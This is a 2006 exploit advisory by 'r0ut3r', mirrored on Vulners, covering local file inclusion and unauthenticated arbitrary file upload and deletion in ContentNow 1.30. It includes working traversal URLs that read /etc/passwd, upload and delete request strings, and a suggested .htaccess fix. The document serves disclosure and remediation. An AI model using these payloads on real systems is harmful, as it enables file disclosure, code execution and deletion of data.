Vulners
Lucene search
ContentNow 1.30 - Local File Inclusion Arbitrary File UploadDelete
#####################################################################################
# #
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# #
# ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities #
# #
#####################################################################################
# #
# Software: ContentNow 1.30 Vulnerabilities #
# #
# Vendor: http://www.contentnow.mf4k.de/ #
# #
# Released: 2006/11/13 #
# #
# Discovered By: r0ut3r (writ3r [at] gmail.com) #
# #
# Criticality: Highly critical #
# #
#####################################################################################
Local file inclusion vulnerability
------------------------------------
Vuln code:
----------
33 // get/set language
34 $setLang= (empty ($_GET['lang'])) ? $cnCore->getBackendLanguage() : $_GET['lang'];
35
36 // define language
37 include_once ('./language/'.$setLang.'.language.php');
38 $lang= $cnLanguageArray[$setLang];
Exploit:
--------
http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00
Probably more, never checked all files.
File Upload/Command Execution Vulnerability:
---------------------------------------------
Note: They tell you to set 777 permissions on install for certain folders.
http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en
set path to equal dir location:
/ = root path
Select file, then upload it.
File Removal Vulnerability:
----------------------------
To delete files
http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false
set path to equal dir location:
/ = root path
set delfile for file you want to delete:
q.php
More Information:
-----------------
Email: writ3r [at] gmail.com
Fix:
-----
How about some authentication?!
Only allow the upload of certain files types, depends what you want it to use.
As for local file includes, work out a better way to set languages, ie: make sure the language file included is required for the cms.
Quick Fix:
----------
Setup .htaccess on cn/
Example Fix:
------------
.htaccess:
AuthName "ContentNow Fix!"
AuthType Basic
AuthUserFile /var/www/html/cn/.htpasswd
Require valid-user
This will prevent anyone from accessing this folder - this would be a solution for administrators whilst an upgrade, or patch is created.
If you do want to access this better make a .htpasswd file to.
# milw0rm.com [2006-11-13]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2006 00:00Current
0.2Low risk
Vulners AI Score0.2